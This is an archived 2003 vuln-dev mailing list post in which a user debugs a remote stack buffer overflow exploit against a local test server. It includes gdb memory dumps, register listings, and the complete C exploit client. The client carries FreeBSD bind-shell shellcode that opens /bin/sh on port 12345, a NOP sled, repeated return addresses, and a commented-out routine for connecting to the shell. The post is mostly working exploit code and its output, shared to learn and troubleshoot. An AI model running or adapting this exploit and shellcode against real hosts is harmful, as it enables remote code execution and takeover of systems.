Vulnerability Development mailing list archives
Re: sample buffer overflow exploit problem
From: Ganbold <ganbold () micom mng net>
Date: Wed, 01 Oct 2003 10:06:52 +0900
Hi Orlando, I tested your modified exploit. When I run the exploit with offset 320:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 320
scsize: 131
ret: 0xbfbffa40
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on the server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
-----------------------------------------------------------------------------------------------------------------------------
It binds a shell to port 12345. When I connect to it, in gdb I see the following:
-----------------------------------------------------------------------------------------------------------------------------
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xbfbffa8f in ?? ()
(gdb) x/200bx $esp-200
0xbfbff9c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa10: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa18: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa20: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa28: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa30: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa38: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa40: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83   ^^^^^^ shellcode begins
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66
0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a
0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80
0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0
0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50
0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57
0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31
-----------------------------------------------------------------------------------------------------------------------------
As you can see, the shellcode is not complete: I see only half of my shellcode. So when the exploit runs, the server doesn't crash and binds the shell port. But when I connect to port 12345, the server crashes and the x/200bx $esp-200 command shows only the half of my shellcode seen above.
Following is register information after crash: ----------------------------------------------------------------------------------------------------------------------------- (gdb) info all-registers eax 0x9 9 ecx 0xbfbffaec -1077937428 edx 0xbfbffacc -1077937460 ebx 0x9 9 esp 0xbfbffa90 0xbfbffa90 ebp 0xbfbffa40 0xbfbffa40 esi 0xbfbffb80 -1077937280 edi 0x8 8 eip 0xbfbffa8f 0xbfbffa8f eflags 0x10206 66054 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000) st1 -nan(0x000002000) (raw 0xffff0000000000002000) st2 0 (raw 0x00000000000000000000) st3 0 (raw 0x00000000000000000000) st4 0 (raw 0x00000000000000000000)st5 3.6715164242195896804332733154296875e-10 (raw 0x3fdfc9d8000000000000)
st6 24 (raw 0x4003c000000000000000)
st7 60 (raw 0x4004f000000000000000)
fctrl 0x127f 4735
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-----------------------------------------------------------------------------------------------------------------------------
But when I run the exploit with offset 0 I see a different situation:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 0
scsize: 131
ret: 0xbfbffb80
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on the server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGILL, Illegal instruction.
0xbfbffb8c in ??
() (gdb) x/300bx $esp-300 0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83 ^^^^^^ shellcode begins 0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50 0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66 0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a 0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80 0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0 0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50 0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57 0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31 0xbfbffa90: 0xc0 0x50 0x53 0x50 0xb0 0x5a 0xcd 0x80 0xbfbffa98: 0xb0 0x01 0x50 0x53 0x50 0x83 0xc0 0x59 0xbfbffaa0: 0xcd 0x80 0xb0 0x02 0x50 0x53 0x50 0x83 0xbfbffaa8: 0xc0 0x58 0xcd 0x80 0x31 0xc0 0x50 0x68 0xbfbffab0: 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0xbfbffab8: 0x6e 0x89 0xe3 0x50 0x53 0x89 0xe2 0x50 0xbfbffac0: 0x52 0x53 0x50 0xb0 0x3b 0xcd 0x80 0x31 0xbfbffac8: 0xc0 0x40 0x50 0x50 0xcd 0x80 0x90 0x90^^^^^^ shellcode ends
0xbfbffad0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffad8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffae0: 0x90 0x90 0x90 0x90 0x80 0xfb 0xbf 0xbf^^^^^^ return address
0xbfbffae8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffaf0: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffaf8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffb00: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffb08: 0x80 0xfb 0xbf 0x2c 0x20 0x6e 0x69 0x63 ^^^^^^ ends here 0xbfbffb10: 0x65 0x20 0x74 0x6f 0x20 0x6d 0x65 0x65 0xbfbffb18: 0x74 0x20 0x79 0x6f 0x75 0x21 0x0d 0x0a 0xbfbffb20: 0x00 0x00 0x00 0x00 0x74 0x02 0x76 0xfc 0xbfbffb28: 0x00 0x00 0x00 0x00 0x41 0xc6 0x04 0x28 0xbfbffb30: 0x7e 0xf7 0x0f 0x28 0x60 0x00 0x00 0x00 0xbfbffb38: 0x10 0x00 0x00 0x00 0x07 0x00 0x00 0x00 0xbfbffb40: 0x06 0x00 0x00 0x00 0x02 0x00 0x00 0x00 0xbfbffb48: 0x6c 0xfb 0xbf 0xbf 0x6c 0xfb 0xbf 0xbf 0xbfbffb50: 0x15 0x87 0x04 0x08 0x02 0x00 0x00 0x00 0xbfbffb58: 0x74 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffb60: 0x68 0xfb 0xbf 0xbf 0x00 0x00 0x00 0x00 0xbfbffb68: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffb70: 0x02 0x00 0x00 0x00 ----------------------------------------------------------------------------------------------------------------------------- As you see I see all my shellcode and return address fully. 
Following is the register infos: ----------------------------------------------------------------------------------------------------------------------------- (gdb) info all-registers eax 0xffffffff -1 ecx 0x9 9 edx 0xffffffff -1 ebx 0x2 2 esp 0xbfbffb74 0xbfbffb74 ebp 0xbfbffb80 0xbfbffb80 esi 0xbfbffb80 -1077937280 edi 0xbfbffcb2 -1077936974 eip 0xbfbffb8c 0xbfbffb8c eflags 0x10246 66118 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000) st1 -nan(0x000002000) (raw 0xffff0000000000002000) st2 0 (raw 0x00000000000000000000) st3 0 (raw 0x00000000000000000000) st4 0 (raw 0x00000000000000000000) st5 0 (raw 0x00000000000000000000) st6 0 (raw 0x00000000000000000000) st7 10 (raw 0x4002a000000000000000) fctrl 0x127f 4735 fstat 0x0 0 ftag 0x0 0 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0 ----------------------------------------------------------------------------------------------------------------------------- I'm very confused and I don't know yet what to do. Please give me some advice. thanks in advance, Ganbold At 01:45 PM 9/30/2003 -0500, you wrote:
/*
 * Proof-of-concept client posted as an attachment in the vuln-dev thread
 * above, reproduced as posted (only comments added). It builds a fixed
 * 1064-byte payload (NOP sled, shellcode, repeated return address) and
 * sends it to target-ip:port over TCP.
 *
 * NOTE(review): several functions used below are never declared here:
 * memset/memcpy/strlen need <string.h>, atoi/exit need <stdlib.h>, and
 * select/fd_set need <sys/select.h>. The code relies on implicit function
 * declarations, which C99 removed; recent compilers reject them.
 */
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>

/*
 * FreeBSD shellcode - binds /bin/sh to a port 12345
 *
 * Claes M. Nyberg 20020619
 *
 * <cmn () darklab org>, <md0claes () mdstud chalmers se>
 */
/*
 * Kept byte-for-byte as posted: 131 bytes of code plus the implicit string
 * NUL, hence the sizeof(shellcode)-1 used in main() (matches the
 * "scsize: 131" printed in the thread).
 */
char shellcode[] =
/* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";

/*
 * Guessed return address written repeatedly at the end of the payload
 * (see main()); the trailing comment records a second candidate value.
 */
#define RET 0xbfbffb80 //0xbfbffa48

/*
 * exec_sh - interactive relay between the terminal and an open socket.
 *
 * Loops forever: each line typed on stdin is written to sockfd, and
 * anything read from sockfd is printed to stdout. Calls exit(0) as soon as
 * read() returns 0 or -1, so the int return type is never actually used.
 * Its only call site is inside the commented-out block at the end of
 * main(), so in the posted version this function is dead code.
 *
 * NOTE(review): select()'s first argument must be the highest descriptor
 * plus one; the hard-coded 255 only covers descriptors below 255.
 * NOTE(review): the return values of fgets() and write() are ignored, and
 * a read() that fills all 4096 bytes of rcv leaves no NUL terminator for
 * the following fputs().
 */
int exec_sh(int sockfd)
{
    char snd[4096],rcv[4096];
    fd_set rset;
    while(1)
    {
        FD_ZERO(&rset);
        FD_SET(fileno(stdin),&rset);
        FD_SET(sockfd,&rset);
        select(255,&rset,NULL,NULL,NULL);
        if(FD_ISSET(fileno(stdin),&rset))
        {
            /* zeroing first guarantees a NUL for strlen() even on a full line */
            memset(snd,0,sizeof(snd));
            fgets(snd,sizeof(snd),stdin);
            write(sockfd,snd,strlen(snd));
        }
        if(FD_ISSET(sockfd,&rset))
        {
            memset(rcv,0,sizeof(rcv));
            /* peer closed or error: terminate the whole process */
            if(read(sockfd,rcv,sizeof(rcv))<=0) exit(0);
            fputs(rcv,stdout);
        }
    }
}

/*
 * main - usage: target-ip port offset
 *
 *   argv[1]  host name or dotted IP, resolved with gethostbyname()
 *   argv[2]  TCP port, parsed with atoi()
 *   argv[3]  decimal value subtracted from RET to form the return address
 *
 * Returns -1 on a usage, name-resolution, socket, connect or send error;
 * otherwise falls off the end of main (C99 treats that as return 0).
 *
 * NOTE(review): atoi() gives no error indication (strtol() would); t is
 * never used; size is an int although send() returns ssize_t.
 */
int main(int argc, char *argv[])
{
    char buffer[1064];
    int s,t, i, size,offset;
    struct sockaddr_in remote;
    struct hostent *host;
    if(argc != 4)
    {
        printf("Usage: %s target-ip port offset\n", argv[0]);
        return -1;
    }
    /* despite its name, "offset" holds the final return address (printed as "ret:") */
    offset = RET - atoi(argv[3]);
    // filling buffer with NOPs
    /* all 1064 bytes, so every byte not overwritten below stays 0x90 */
    memset(buffer, 0x90, 1064);
    /* NOTE(review): sizeof(shellcode)-1 is a size_t; %d expects int (use %zu) */
    printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset);
    //copying shellcode into buffer
    /* 131 bytes placed so the copy ends at buffer[999]: start index is 1001-132 = 869 */
    memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode)-1);
    // Copying the return address multiple times at the end of the buffer...
    /*
     * Stores at i = 1022, 1026, ..., 1058; the last one covers
     * buffer[1058..1061]. Writing an int through &buffer[i] at indices that
     * are not multiples of 4 is an unaligned access (tolerated on x86,
     * undefined behaviour in general).
     */
    for(i=1022; i < 1060; i+=4)
    {
        * ((int *) &buffer[i]) = offset;
    }
    /*
     * Presumably a terminator for the receiver's string handling; it also
     * overwrites the last byte of the final address copy above. Note that
     * send() below is bounded by sizeof(buffer), not by this NUL, so
     * buffer[1062] and buffer[1063] (still 0x90) are transmitted as well.
     */
    buffer[1061] = 0x0;
    //getting hostname
    /* gethostbyname() is obsolescent (getaddrinfo() replaced it), as was common in 2003 code */
    host=gethostbyname(argv[1]);
    if (host==NULL)
    {
        fprintf(stderr, "Unknown Host %s\n",argv[1]);
        return -1;
    }
    // creating socket...
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
    {
        fprintf(stderr, "Error: Socket\n");
        return -1;
    }
    /* NOTE(review): remote is never zeroed, so sin_zero is left indeterminate */
    remote.sin_family = AF_INET;
    remote.sin_addr = *((struct in_addr *)host->h_addr);
    remote.sin_port = htons(atoi(argv[2]));
    // connecting with destination host
    if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    {
        close(s);
        fprintf(stderr, "Error: connect\n");
        return -1;
    }
    //sending exploit string
    /* the whole 1064-byte array is sent in one call; a short send is not handled */
    size = send(s, buffer, sizeof(buffer), 0);
    if (size==-1)
    {
        close(s);
        fprintf(stderr, "sending data failed\n");
        return -1;
    }
    /*
     * Disabled second stage, kept verbatim from the post: reconnect to the
     * bound shell and hand the socket to exec_sh().
     */
    /*
    printf("[-] Connecting to bindshell...\n");
    remote.sin_family = AF_INET;
    remote.sin_addr = *((struct in_addr *)host->h_addr);
    remote.sin_port = htons(12345);
    if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    {
        close(s);
        fprintf(stderr, "Error: connect\n");
        return -1;
    }
    exec_sh(s);
    */
    // closing socket
    close(s);
}